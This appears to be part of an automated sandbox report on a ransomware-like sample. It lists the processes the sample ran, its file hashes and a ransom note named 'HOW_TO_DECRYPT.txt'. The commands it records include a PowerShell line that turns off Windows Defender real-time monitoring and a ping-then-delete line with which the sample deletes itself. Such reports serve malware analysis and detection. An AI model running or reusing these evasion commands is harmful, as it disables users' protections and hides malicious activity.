C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\ihr6_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d231001ebde76004956dc1ebf05bfe89
SHA1 e12511cd49c12b1ee95cc77c079c29ca6fcb5ee6
SHA256 8c4be0808f55d0360e03f072cc6405d45db123d4d48cb1e0498ba0d7fa126912
SHA512 933d3e1e17fa1b01943c77874330e86c01473d48a36b91b3342c6ed95ce3818a599f983e5725ad978158c6653816852192bf272bd4cec9dd4a322bd0a8ece477

C:\ihr6_HOW_TO_DECRYPT.txt

MD5 107704bd1e26587457b7c672bd711880
SHA1 83d11d409c0ada8e0c2e80308e49b7184cde666f
SHA256 6e402744949bc5490c0226601aff1ce9387a001c194b43a3cc7f362b9abce5f7
SHA512 b811816bd9a9d3da6ab03391b7b895f989daf7dc04ea3b60349e8ef4fff798acdc65eaefa31d2c58da698253693de233b1ead5eb15ba7dd41df1db66e07d3d8b

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-23 14:55

Reported

2022-03-23 14:58

Platform

win10v2004-en-20220113

Max time kernel

1s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Network

Files

N/A